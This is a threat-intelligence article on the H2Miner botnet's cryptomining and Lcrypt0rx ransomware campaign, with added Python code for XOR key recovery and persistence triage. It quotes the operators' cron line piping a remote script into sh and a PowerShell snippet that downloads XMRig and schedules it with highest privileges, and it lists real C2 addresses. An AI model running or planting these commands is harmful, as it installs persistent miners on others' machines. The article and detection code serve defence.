H2Miner Attacking Linux, Windows, and Containers to Mine Monero


The H2Miner botnet, first observed in late 2019, has resurfaced with an expanded arsenal that blurs the line between cryptojacking and ransomware.

The latest campaign leverages inexpensive virtual private servers (VPS) and a grab-bag of commodity malware to compromise Linux hosts, Windows workstations, and container workloads simultaneously.

By chaining cloud-aware shell scripts, cross-compiled binaries, and living-off-the-land commands, the operators pivot quickly from initial foothold to Monero mining—often before defenders notice the spike in CPU load.


Attacks begin with opportunistic exploitation of misconfigured services or vulnerable applications such as Apache ActiveMQ (CVE-2023-46604) and Log4Shell.

Once inside, the botnet deploys tailored loader scripts (ce.sh on Linux and 1.ps1 on Windows) that terminate competing miners, disable endpoint protection, and fetch the XMRig binary from 78.153.140.66. Containers are not spared: spr.sh scans Docker images and ejects Alibaba Cloud's aegis agent before dropping Kinsing.

The same infrastructure hosts a Cobalt Strike team server at 47.97.113.36 and Bitbucket repositories that disguise payloads as “MicrosoftSoftware.exe,” illustrating a mature, multi-tier command-and-control (C2) design.

Fortinet analysts noted that a new VBScript ransomware, Lcrypt0rx, is now bundled alongside the miners.

[Figure: Encryption logic and XOR implementation (Source – Fortinet)]

Although its encryption routine is rudimentary (an 8,192-character XOR key combined with a per-file salt), the script still overwrites the Master Boot Record and litters the system with decoy persistence hooks.
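To make concrete why a reused XOR key stream counts as rudimentary, here is an added Python illustration. It is my own code, not Fortinet's analysis or the Lcrypt0rx script, and it assumes, hypothetically, that the 8,192-character key is applied cyclically and that the per-file salt is appended to it; the page does not document the real construction, and the 16-byte salt length and the sample file contents are made up. Under that assumption, one file for which the victim still has a clean copy (a backup, an e-mailed attachment) yields the key bytes and decrypts the first 8,192 bytes of every other encrypted file on the host.

```python
"""Known-plaintext recovery against a cyclically reused XOR key.

Added example; NOT Lcrypt0rx's real routine. Assumed (hypothetical) construction:
    key stream = master_key (8192 bytes) || per_file_salt, repeated over the file.
"""
import random

KEY_LEN = 8192   # key length stated in the article
SALT_LEN = 16    # assumed; the article gives no salt size


def xor_stream(data: bytes, key: bytes) -> bytes:
    """XOR data against a cyclically repeated key. Encrypt and decrypt are the same op."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encrypt_file(plaintext: bytes, master_key: bytes, salt: bytes) -> bytes:
    """Hypothetical scheme: the per-file salt is just glued onto the master key."""
    return xor_stream(plaintext, master_key + salt)


def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """c XOR p returns the key stream for every position where both are known."""
    n = min(len(ciphertext), len(known_plaintext))
    return bytes(c ^ p for c, p in zip(ciphertext[:n], known_plaintext[:n]))


def decrypt_shared_prefix(ciphertext: bytes, keystream: bytes) -> bytes:
    """Decrypt the leading bytes of any other file encrypted under the same master key.

    Under the assumed construction only positions 0..KEY_LEN-1 are salt-independent,
    so that is all a key stream recovered from a *different* file can be trusted for.
    """
    usable = keystream[:KEY_LEN]
    return xor_stream(ciphertext[:len(usable)], usable)


def demo():
    """Constructed scenario: file A has a clean copy, file B does not."""
    rng = random.Random(2025)            # deterministic sample data
    rnd = lambda n: bytes(rng.getrandbits(8) for _ in range(n))

    master_key = rnd(KEY_LEN)
    file_a = b"%PDF-1.7\n" + rnd(KEY_LEN + 500)   # clean copy available (backup)
    file_b = b"PK\x03\x04" + rnd(KEY_LEN + 300)   # no clean copy, different salt

    enc_a = encrypt_file(file_a, master_key, rnd(SALT_LEN))
    enc_b = encrypt_file(file_b, master_key, rnd(SALT_LEN))

    keystream = recover_keystream(enc_a, file_a)      # needs A longer than KEY_LEN
    recovered = decrypt_shared_prefix(enc_b, keystream)
    return recovered == file_b[:KEY_LEN], recovered[:4]


if __name__ == "__main__":
    ok, magic = demo()
    print("prefix of file B recovered:", ok, "magic bytes:", magic)
```

Bytes beyond position 8,191 in file B still depend on B's own salt, so a full recovery needs either that salt or a second known-plaintext file covering a whole period; the point is that nothing about the scheme stops the first 8 KiB of every document from falling to one known file.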

[Figure: Attribute manipulation and MBR overwrite (Source – Fortinet)]

The overlap of wallets and hosting addresses suggests either collaboration with, or direct control by, H2Miner’s original crew.

[Figure: Cron entry and clearing command history (Source – Fortinet)]

The figure shows how ce.sh implants a cron job that re-downloads and re-executes the script every ten minutes:

( crontab -l 2>/dev/null ; 
  echo "*/10 * * * * curl -fsSL http://80.64.16.241/ce.sh | sh" ) | crontab -

Its Windows counterpart, 1.ps1, fetches the miner and registers it as a scheduled task that fires every 15 minutes with the highest available privileges:

$miner  = "$env:TEMP\sysupdate.exe"
Invoke-WebRequest -Uri "http://78.153.140.66/xmrig.exe" -OutFile $miner
schtasks /create /f /tn "Update service for Windows Service" `
         /tr "$miner" /sc minute /mo 15 /rl highest

Infection Mechanism and Persistence

H2Miner's staying power stems from its layered infection sequence. The initial shell scripts enumerate defensive processes, kill them with broad process-name patterns, and wipe audit trails by clearing the shell history.

[Figure: Wallpaper defacement (Source – Fortinet)]

On Windows, Lcrypt0rx escalates via Shell.Application to relaunch itself with wscript.exe /elevated, then attempts to cement persistence by mis-writing its path into the Winlogon Shell and IFEO keys.

While that registry logic fails, the malware compensates by embedding six auxiliary scripts—​from advapi32_ext.vbs, which loops through taskkill /f /im *av*.exe, to USB_bridge.vbs, a rudimentary autorun propagator.

Each helper is dropped with +h +s +r attributes and invoked under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, ensuring at least one copy survives cleanup.

This belt-and-suspenders approach, coupled with frequent updater scripts like cpr.sh, lets the botnet respawn miners even after a partial eviction.

For defenders, that means endpoint remediation must include container images, scheduled tasks, cron entries, and rogue registry keys; otherwise, the Monero wallets—​notably 4ASk4RhU…p8SahC—​will continue siphoning stolen compute cycles long after the first alert is closed.
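As an added, self-contained Python triage example (my own code, not Fortinet's tooling), the script below scans constructed samples of three of the artefact types just listed: a user crontab, schtasks /query /fo csv output (columns trimmed for the example), and a reg query dump of the HKCU Run key. The indicator values (C2 addresses, task name, file names) are the ones named in this article; the fetch-and-pipe-to-shell and script-host regexes are my own heuristics, and every sample line is constructed for the example rather than captured from an infected host. clean_crontab() shows the matching remediation step for the cron case.

```python
"""Persistence triage for the artefacts this campaign plants.

Added example, not Fortinet's code. Indicator strings are taken from the article;
the regexes and the sample artefact dumps below are constructed for illustration.
"""
import re

# --- indicators named in the article -------------------------------------------
C2_HOSTS = {"78.153.140.66", "80.64.16.241", "47.97.113.36"}
KNOWN_TASK_NAMES = {"Update service for Windows Service"}
KNOWN_FILES = {"ce.sh", "spr.sh", "cpr.sh", "1.ps1", "xmrig.exe", "sysupdate.exe",
               "MicrosoftSoftware.exe", "advapi32_ext.vbs", "USB_bridge.vbs"}

# --- generic heuristics (mine) ---------------------------------------------------
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba|da)?sh\b")   # fetch | sh
IP_URL = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})")                  # raw-IP URL
HIDDEN_SCRIPT_HOST = re.compile(r"\b[wc]script(?:\.exe)?\b.*\.vbs\b", re.I)   # Run -> .vbs


def reasons_for(line: str) -> list:
    """Return the list of heuristics a single artefact line trips (empty = clean)."""
    r = []
    if PIPE_TO_SHELL.search(line):
        r.append("remote script piped to shell")
    m = IP_URL.search(line)
    if m:
        ip = m.group(1)
        r.append("known C2 host " + ip if ip in C2_HOSTS else "raw-IP download URL")
    low = line.lower()
    r += ["known filename " + f for f in sorted(KNOWN_FILES) if f.lower() in low]
    r += ["known task name" for t in KNOWN_TASK_NAMES if t in line]
    if HIDDEN_SCRIPT_HOST.search(line):
        r.append("script host launching .vbs at logon")
    return r


def triage(text: str, source: str) -> list:
    """(source, line, reasons) for every non-comment line that trips a heuristic."""
    out = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        why = reasons_for(line)
        if why:
            out.append((source, line.strip(), why))
    return out


def clean_crontab(text: str) -> str:
    """Crontab with flagged entries removed, suitable for `crontab -` (review first!)."""
    return "\n".join(l for l in text.splitlines() if not reasons_for(l)) + "\n"


# --- constructed samples (NOT real captures) -----------------------------------
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -fsSL http://80.64.16.241/ce.sh | sh
*/15 * * * * wget -q -O- http://198.51.100.7/update.sh | bash
"""

SAMPLE_SCHTASKS = """\
"TaskName","Next Run Time","Status","Task To Run"
"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","N/A","Ready","%windir%\\system32\\defrag.exe -c -h -o -$"
"\\Update service for Windows Service","7/1/2025 10:15:00 AM","Ready","C:\\Users\\u\\AppData\\Local\\Temp\\sysupdate.exe"
"""

SAMPLE_RUNKEY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive         REG_SZ    "C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    advapi32_ext     REG_SZ    wscript.exe //B "C:\Users\u\AppData\Roaming\advapi32_ext.vbs"
    USB_bridge       REG_SZ    wscript.exe //B "C:\Users\u\AppData\Roaming\USB_bridge.vbs"
"""


def triage_all() -> list:
    """Run every sample through triage(); real use feeds `crontab -l`, schtasks, reg query."""
    return (triage(SAMPLE_CRONTAB, "crontab")
            + triage(SAMPLE_SCHTASKS, "schtasks")
            + triage(SAMPLE_RUNKEY, "HKCU Run"))


if __name__ == "__main__":
    for src, line, why in triage_all():
        print(f"[{src}] {line}\n    -> {', '.join(why)}")
```

Feed the real artefacts in with crontab -l (for each user, plus /etc/cron.d), schtasks /query /fo csv /v, and reg query of both the HKCU and HKLM Run keys; container images need a separate pass over their layers for the same file names. Treat the IP and file-name lists as a starting point, since the article already shows the download host changing between scripts (78.153.140.66 versus 80.64.16.241).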


